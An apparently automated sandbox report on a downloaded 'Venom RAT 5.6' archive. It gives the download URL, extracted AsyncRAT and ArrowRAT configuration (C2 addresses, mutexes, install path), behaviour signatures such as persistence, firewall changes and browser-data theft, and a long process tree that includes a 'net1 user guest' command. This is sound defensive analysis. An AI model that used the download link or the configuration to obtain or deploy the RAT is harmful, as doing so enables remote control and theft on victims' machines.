Analysis
-
max time kernel
1800s -
max time network
1795s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
-
submitted
07-02-2023 16:01
General
-
Target
https://anonfiles.com/c3c1C4G9y0/Venom_RAT_5.6_tombstone3_3883_rar
Score
10/10
Malware Config
Extracted
Family
asyncrat
Version
5.0.5
Botnet
Venom Clients
C2
127.0.0.1:4449
Mutex
Venom_RAT_HVNC_Mutex_Venom RAT_HVNC
Attributes
-
delay
1
-
install
true
-
install_file
poop_cheez.exe
-
install_folder
%AppData%
aes.plain
Extracted
Family
arrowrat
Botnet
VenomHVNC
C2
10.100.102.1:4448
10.127.0.104:4448
127.0.0.1:4449
Mutex
DBpzhChHX.exe
Signatures
-
ArrowRat
Remote access tool with various capabilities first seen in late 2021.
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
-
Async RAT payload 4 IoCs
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Downloads MZ/PE file
-
Modifies Installed Components in the registry 2 TTPs 8 IoCs
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 6 IoCs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 55 IoCs
-
Loads dropped DLL 50 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 64 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Installs/modifies Browser Helper Object 2 TTPs 8 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 9 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 22 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Collects information from the system 1 TTPs 1 IoCs
Uses WMIC.exe to find detailed system information.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 11 IoCs
-
Gathers network information 2 TTPs 2 IoCs
Uses commandline utility to view network configuration.
-
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Modifies Internet Explorer settings 1 TTPs 29 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Opens file in notepad (likely ransom note) 2 IoCs
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 8 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 31 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
System policy modification 1 TTPs 4 IoCs
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://anonfiles.com/c3c1C4G9y0/Venom_RAT_5.6_tombstone3_3883_rar1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa03d34f50,0x7ffa03d34f60,0x7ffa03d34f702⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1656 /prefetch:22⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2008 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3024 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3036 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4644 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest3⤵
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5340 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3196 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3100 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4956 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3572 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:12⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5264 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3552 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4332 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4292 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3492 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4560 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2756 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4292 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4548 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4556 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4700 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5496 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4496 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=912 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5076 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5852 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5248 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1564 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=956 /prefetch:82⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,16961219965808253553,2659731872109217078,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1576 /prefetch:82⤵
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\" -spe -an -ai#7zMap18429:124:7zEvent81671⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_SOURCE_CODE\mydiscord.txt1⤵
- Opens file in notepad (likely ransom note)
-
C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\Venom RAT + HVNC.exe"C:\Users\Admin\Downloads\Venom_RAT_5.6_[tombstone3#3883]\Venom_RAT_COMPILED\Venom RAT + HVNC.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://vimeo.com/user1400556092⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9f9ec46f8,0x7ff9f9ec4708,0x7ff9f9ec47183⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:23⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3872 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3888 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5084 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5172 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5700 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6360 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:13⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5556 /prefetch:83⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2164,13734702733837979593,5183195216899121684,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5964 /prefetch:83⤵
-
-
